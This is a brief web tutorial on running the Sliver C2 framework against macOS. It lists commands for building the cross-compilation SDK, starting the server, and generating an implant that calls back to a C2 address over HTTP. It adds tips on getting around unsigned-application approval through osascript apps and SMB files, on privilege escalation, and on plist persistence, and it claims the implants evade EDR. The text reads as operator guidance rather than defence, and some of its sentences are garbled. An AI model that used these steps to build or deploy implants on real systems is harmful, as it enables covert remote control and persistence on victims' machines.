• Home
  • Articles
  • Tools
  • Vloggers
  • Support


How to use the Sliver C2 framework

Setup and using the Sliver framework

The Sliver exploitation framework can be utilied against all operating systems and that includes Apple Mac OSX. Osxcross project is required, plus the Sliver daemon.
Therefore the steps are setup and install Sliver, Sliver-server and Osxcross https://github.com/tpoechtrager/osxcross#packaging-the-sdk, 
Linux server must also have Xcode.7.0.1.dmg and  Command Line Tools.pkg file packs in correct folders to create Mac implants.
Begin creation with: gen_sdk_package_tools_dmg.sh Xcode_7.0.1.dmg
./target/bin/xar -xf "Command Line Tools.pkg" -C /home/v/installs/osxcross/build/tmp_29947/ pkg_data
./gen_sdk_package_p7zip.sh Xcode_7.0.1.dmg
mv MacOSX10.11.sdk.tar.bz2 installs/osxcross/tarballs/

The sliver-server needs to always be running as a daemon. It Needs be started with systemctl start sliver (or sliver-server if you called it that) Dominic Breuker Learning sliver c2 installation.

sudo netstat -antop | grep 31337 will show the service started:
tcp6   0  0 :::31337            :::*                LISTEN  8496/sliver-server   off (0.00/0/0)

Then the Framework command interface must be started with command sliver which shows the Command Line interface.
That connections the client like so:
tcp6   0  0 ::1:31337           ::1:37598           ESTABLISHED 8496/sliver-server   keepalive (12.41/0/0)
tcp6   0  0 ::1:37598           ::1:31337           ESTABLISHED 13583/sliver     keepalive (12.35/0/0)

From there it is straightforward to create a Macho implant with command: generate --http 10.0.0.1 --os mac --save /home/user/
Ensure protocol job for implant is running: jobs
Needed download on one protocol (HTTPS) c2 implant communicating back on another protocol (HTTP jobs)
Osacript can be saved as application type and perform steps to run c2
Application files from Internet not signed can't be run without approval. But local files / SMB files can.
Privesc needed xcode installed plus clang++ execution as clang standard threw too many issues
Sliver Implants are Go-lang based Machos and are not stopped from execution by EDR.


Sliver CLI, with sessions listed and new arriving session from implant

Sliver Connect

Sliver CLI Select session

Sliver Connect

Using Sliver shell, updating a Mac OSX plist for persistence

Sliver Connect

Plist detail

Sliver Connect